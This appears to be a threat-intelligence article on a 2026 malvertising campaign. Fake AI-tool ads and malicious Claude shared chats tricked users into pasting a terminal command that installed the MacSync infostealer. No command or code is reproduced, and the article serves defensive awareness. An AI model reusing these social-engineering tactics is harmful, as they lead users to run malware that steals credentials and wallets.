The cybersecurity landscape continues to evolve as threat actors adopt increasingly sophisticated techniques to exploit user trust. One of the most concerning developments observed in 2026 is a large-scale malvertising campaign that leveraged Google Ads to distribute ClickFix-style social engineering attacks by impersonating popular AI development platforms. The campaign targeted users actively searching for trusted AI tools such as ChatGPT Codex, Claude AI, Cursor IDE, Perplexity AI, and JetBrains products, demonstrating how cybercriminals are adapting their tactics to capitalize on the growing adoption of artificial intelligence technologies.
Unlike traditional malware campaigns that rely on malicious downloads or software vulnerabilities, this operation focused on manipulating technically skilled users into executing malicious commands themselves. By abusing trusted platforms including GitLab Pages and later Anthropic’s Claude shared chat functionality, attackers successfully created a convincing ecosystem of fraudulent resources that appeared legitimate even to security-conscious professionals. This campaign highlights the growing challenge organizations face as cybercriminals increasingly exploit trusted cloud services and AI-related branding to bypass conventional security controls.
Understanding the Evolution of the ClickFix Attack Technique
ClickFix attacks represent a relatively modern social engineering methodology that differs significantly from traditional phishing campaigns. Instead of delivering malware through direct downloads, attackers present users with what appears to be a troubleshooting guide, installation procedure, or technical fix. Victims are instructed to manually copy and execute terminal or PowerShell commands under the belief that they are installing software, resolving compatibility issues, or completing a legitimate setup process.
The effectiveness of this approach lies in its ability to circumvent many security solutions. Since the victim voluntarily executes the commands, endpoint protection systems may not immediately identify the activity as malicious. Furthermore, users searching for AI development tools are often developers, engineers, IT professionals, and technically proficient individuals who regularly use command-line interfaces. This familiarity with terminal commands reduces suspicion and increases the likelihood of successful compromise. Researchers observed that the attackers specifically targeted audiences interested in AI-powered development platforms. More than 82% of campaign traffic was associated with searches related to AI coding assistants, development environments, and machine learning tools. This strategic targeting demonstrates a deep understanding of user behavior and highlights how threat actors are refining their victim selection processes to maximize infection success rates.
Abuse of Google Ads and Trusted Infrastructure
A critical component of the campaign’s success was the abuse of Google Ads. By purchasing sponsored search placements, attackers ensured their malicious pages appeared prominently in search results for popular AI-related keywords. Users searching for software downloads often trust sponsored listings, assuming they have undergone verification processes. The attackers deployed an extensive infrastructure consisting of 92 unique malicious hostnames hosted through GitLab Pages. GitLab Pages allows users to create free static websites under the trusted *.gitlab.io domain. Since GitLab is a widely respected software development platform, URLs hosted on its infrastructure frequently bypass basic reputation-based security checks.
The threat actors rapidly created and rotated dozens of subdomains designed to mimic legitimate software download portals. Examples included domains impersonating Claude Desktop, Claude Code, ChatGPT Codex, Cursor IDE, Perplexity AI, and JetBrains products. By continuously generating new domains, attackers maintained campaign effectiveness while avoiding detection and blacklisting efforts. This infrastructure strategy demonstrates a growing trend in cybercrime where adversaries prioritize trusted cloud services rather than hosting malicious content on obviously suspicious domains. Such tactics significantly increase the likelihood that users will perceive the content as legitimate.
Campaign Progression and Infrastructure Expansion
The operation evolved through six distinct phases between April and June 2026. During the initial wave, attackers primarily focused on Claude-related lures while simultaneously operating Mac utility scams targeting users searching for system optimization tools. The campaign generated substantial traffic, particularly in Taiwan, Japan, and Malaysia. As the operation matured, additional brands were incorporated into the attack strategy. New fraudulent pages imitated JetBrains products, Cursor IDE, Perplexity AI, and OpenAI’s ChatGPT Codex offerings. The introduction of multiple software brands indicates that attackers were actively testing keyword performance and measuring which product names generated the highest engagement rates.
By the third and fourth waves, infrastructure complexity increased dramatically. Numerous Claude-themed domains were deployed alongside ChatGPT and Codex impersonation sites. Traffic analysis suggested that Claude-related search terms consistently generated the highest engagement, leading attackers to prioritize those lures while continuing to diversify their portfolio of fraudulent brands. The campaign’s scalability demonstrates the effectiveness of automated infrastructure deployment and highlights how modern threat actors can rapidly adapt based on advertising performance metrics and victim engagement data.
The Shift from GitLab Pages to Claude AI Shared Chats
One of the most significant developments occurred during the fifth phase of the campaign when attackers transitioned away from self-hosted GitLab Pages infrastructure and began exploiting Claude AI’s legitimate shared chat functionality. Instead of directing victims to fake websites, Google Ads began redirecting users directly to public Claude AI shared conversation URLs. These pages were hosted entirely on the legitimate claude.ai domain, protected by valid SSL certificates, and appeared indistinguishable from authentic content.
This represented a major tactical advancement. Traditional security mechanisms often rely on detecting suspicious domains, newly registered websites, or poor domain reputations. When malicious content resides directly on a trusted platform such as Claude AI, many of these defensive signals become ineffective. Researchers identified at least 45 unique malicious shared conversations during the early stages of this transition, eventually growing to more than 61 unique shared chat identifiers. Upon notification, Anthropic investigated the abuse, removed the malicious conversations, banned the responsible accounts, and implemented additional mitigation measures to reduce future misuse of the platform.
Technical Analysis of the Attack Chain
The attack process was carefully designed to appear legitimate at every stage. Victims searching for AI software clicked sponsored advertisements that redirected them to trusted Claude AI shared chat pages. These chats impersonated support representatives, including fake Apple Support and software development teams. The fraudulent support conversations instructed users to open the macOS Terminal application and execute a command that appeared harmless. In reality, the command downloaded and executed a multi-stage malware loader.
Analysis revealed that the downloaded payload first performed environmental checks, including detecting whether Russian keyboard layouts or input methods were enabled. Systems associated with CIS-region users were excluded from infection, a behavior commonly observed among cybercriminal groups seeking to avoid attention from local law enforcement agencies. If the system passed these checks, the loader retrieved and executed the MacSync infostealer. This malware targeted highly sensitive information, including browser credentials, authentication cookies, SSH keys, and cryptocurrency wallet files. The stolen data was subsequently transmitted to attacker-controlled infrastructure for monetization and further exploitation.
The use of multiple stages, environmental awareness, and trusted platforms demonstrates a mature and well-resourced threat operation capable of adapting to modern defensive technologies.
Geographic Impact and Targeting Trends
Analysis of victim interactions revealed a strong concentration in the Asia-Pacific region, which accounted for approximately 67.4% of confirmed campaign activity. Taiwan emerged as the most heavily targeted location, followed by Japan and Singapore. As the campaign transitioned to Claude AI shared chat abuse, geographic targeting expanded considerably. Increased activity was observed in India, France, Italy, and Singapore, suggesting that attackers continuously optimized their advertising campaigns based on regional performance data and user engagement metrics. This geographic diversification indicates a highly organized operation utilizing advanced advertising analytics to maximize return on investment and identify regions with the highest likelihood of successful compromise.
Conclusion
The ClickFix malvertising campaign demonstrates a significant evolution in cybercriminal tactics. By combining Google Ads abuse, trusted cloud hosting services, AI software impersonation, and advanced social engineering, attackers successfully created a highly convincing ecosystem capable of deceiving even technically experienced users.
The campaign’s progression from GitLab Pages abuse to direct exploitation of Claude AI’s shared chat functionality represents a concerning shift toward the weaponization of trusted platforms. As threat actors continue refining these techniques, organizations must adopt a layered security approach that combines technical safeguards, user education, behavioral monitoring, and continuous threat intelligence. The incident serves as a clear warning that in the age of AI, trust itself has become one of the most valuable assets—and one of the most attractive targets for cybercriminals.
